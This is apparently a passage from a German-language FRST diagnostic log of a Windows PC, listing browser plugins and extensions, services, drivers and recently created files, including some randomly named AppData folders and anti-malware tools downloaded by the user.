FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-01]
CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Avira Browserschutz) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdvancedSystemCareService10; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [462624 2017-03-21] (IObit)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [1128432 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [490968 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [490968 2017-07-14] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1524216 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [377976 2017-06-13] (Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [322616 2017-07-13] (Avira Operations GmbH & Co. KG)
R2 AviraUpdaterService; C:\Program Files (x86)\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe [102304 2017-07-25] (Avira Operations GmbH & Co. KG)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
R2 DigitalWave.Update.Service; C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe [440808 2017-04-27] (Digital Wave Ltd.)
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-05-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
R2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (© pdfforge GmbH.)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 SpeedupService; C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe [74800 2017-06-28] (Avira Operations GmbH & Co. KG)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 avdevprot; C:\WINDOWS\System32\DRIVERS\avdevprot.sys [60920 2017-06-15] (Avira Operations GmbH & Co. KG)
R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
R2 avgntflt; C:\WINDOWS\System32\DRIVERS\avgntflt.sys [167504 2017-06-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\WINDOWS\system32\DRIVERS\avipbb.sys [164824 2017-06-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\WINDOWS\system32\DRIVERS\avkmgr.sys [44488 2017-03-02] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\WINDOWS\system32\DRIVERS\avnetflt.sys [88488 2017-03-02] (Avira Operations GmbH & Co. KG)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [30744 2017-03-09] (IObit)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-01 15:01 - 2017-08-01 15:02 - 000030378 _____ C:\Users\****\Desktop\FRST.txt
2017-08-01 12:37 - 2017-08-01 12:37 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****)
2017-08-01 12:17 - 2017-08-01 12:53 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Downloads\mbar-1.09.3.1001.exe
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Desktop\mbar-1.09.3.1001.exe
2017-08-01 12:04 - 2017-08-01 12:04 - 000003404 _____ C:\WINDOWS\System32\Tasks\Driver Booster Scheduler
2017-08-01 12:04 - 2017-08-01 12:04 - 000002327 _____ C:\Users\Public\Desktop\Driver Booster 4.lnk
2017-08-01 12:03 - 2017-08-01 12:03 - 015721672 _____ (IObit ) C:\Users\****\Downloads\driver_booster_setup(4.4.0.512).exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\Documents\Simply Super Software
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\Roaming\Simply Super Software
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2017-08-01 03:18 - 2017-08-01 03:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2017-08-01 03:18 - 2017-08-01 03:18 - 000000000 ____D C:\ProgramData\Simply Super Software
2017-08-01 03:17 - 2017-08-01 03:18 - 061167208 _____ (Simply Super Software ) C:\Users\****\Downloads\trjsetup695.exe
2017-08-01 03:17 - 2017-08-01 03:17 - 001524744 _____ C:\Users\****\Downloads\Trojan Remover - CHIP-Installer.exe
2017-08-01 03:16 - 2017-08-01 03:16 - 001524744 _____ C:\Users\****\Downloads\TCPView - CHIP-Installer.exe
2017-08-01 03:16 - 2017-08-01 03:16 - 000291606 _____ C:\Users\****\Downloads\TcpView-3.05.zip
2017-08-01 02:30 - 2017-08-01 02:30 - 001766912 _____ (Farbar) C:\Users\****\Downloads\FRST_19-04-17.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 001777664 _____ (Farbar) C:\Users\****\Downloads\FRST.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 001777664 _____ (Farbar) C:\Users\****\Desktop\FRST.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Downloads\FRST64.exe
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe
2017-08-01 02:15 - 2017-08-01 02:24 - 000630962 _____ C:\WINDOWS\ntbtlog.txt
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla
2017-08-01 02:04 - 2017-08-01 02:04 - 000001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-08-01 02:04 - 2017-08-01 02:04 - 000001186 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-08-01 02:04 - 2017-08-01 02:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-01 02:04 - 2017-08-01 02:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-01 02:03 - 2017-08-01 02:03 - 000266352 _____ (Mozilla) C:\Users\****\Downloads\Firefox Setup Stub 54.0.1.exe
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-01 01:45 - 2017-08-01 01:45 - 001130328 _____ (Google Inc.) C:\Users\****\Downloads\ChromeSetup (1).exe
2017-08-01 01:44 - 2017-08-01 01:44 - 001130328 _____ (Google Inc.) C:\Users\****\Downloads\ChromeSetup.exe
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew
2017-07-25 13:53 - 2017-07-25 13:53 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
